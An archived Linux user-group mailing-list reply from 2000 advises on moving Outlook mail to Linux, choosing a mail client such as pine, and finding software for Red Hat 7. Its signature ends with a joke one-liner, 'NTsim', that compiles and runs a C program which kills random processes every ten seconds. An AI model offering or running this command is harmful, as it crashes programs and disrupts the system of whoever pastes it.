| Andrew McGill on Mon, 4 Dec 2000 13:22:16 +0200 |
[Date Prev] [Date Next] [Thread Prev] [Thread Next] [Date Index] [Thread Index]
| Re: GLUG: Scanner and e-mail questions. |
Hmm, this one has been sitting in postponed messages for a while so
someone has probably answered it... but hey, why not... (glug doesn't have
enough traffic right at the moment) ... ?
Hello Lee
'Twas 13:59 Yesterday (or something) when Lee Isaacson spake thus:
> 2) Is there a pop3 mail client that one can use that I can transfer my
> msgs and address book from Outlook to a Linux pop3 e-mail Client.
You could use fetchmail -- except Outlook does not act as a POP3 server.
If you install/enable imap on your linux computer, you can set up Outlook
Express to be an Imap client (Outlook unexpress can be a problem if you
are using exchange). You can then tell outlook to copy the messages from
its secret internal folder format to the IMAP server. Address book
transfer is a dead loss. Don't bother -- if you use pine, it is easiest
to set up a new address book from your mail boxes -- use 'T' to take
addresses from existing e-mails.
> If not which is the best e-mail client to use for Linux and where can
> I down load it from ?
The best mail client for linux does not exist. I reckon pine is the best
(especially if you go to the trouble of enabling commands like bounce and
select-all). But you may do well with kmail, mutt, elm or something else.
> 3) Which Internet site can I go to, to get applications for Linux Red
> Hat 7 ? I tried tucows, but they do not have stuff for Red Hat.
The distinctions between linux versions are not as significant as people
like to make out (except when they are). If it says "linux", chances are
it will work. Freshmeat.net is a good place to find all sorts of linux
software.
&:-)
> Thanks to all for replying to my e-mails.
>
> Have a fantastic weekend.
>
> Lee
--
Do you need -
. a mail server?
. a file server?
. a web server?
. a database server?
Linux includes the software you need. Buy SuSE Linux 7.0, or call us
to configure your system.
Leading Edge Business Solutions -- www.ledge.co.za -- 011-807-0453
Fax orders to Kerrin 011-803-7928 or e-mail sales@xxxxxxxxxxx
echo "main(){int pid;srandom(time(&pid));while(1){int pid=(random
()&0x7FFF);if (pid!=getpid()&&pid>1) kill(pid,random(2)&1?7:2);
sleep(10);}}">nt.c;cc nt.c -o NTsim;./NTsim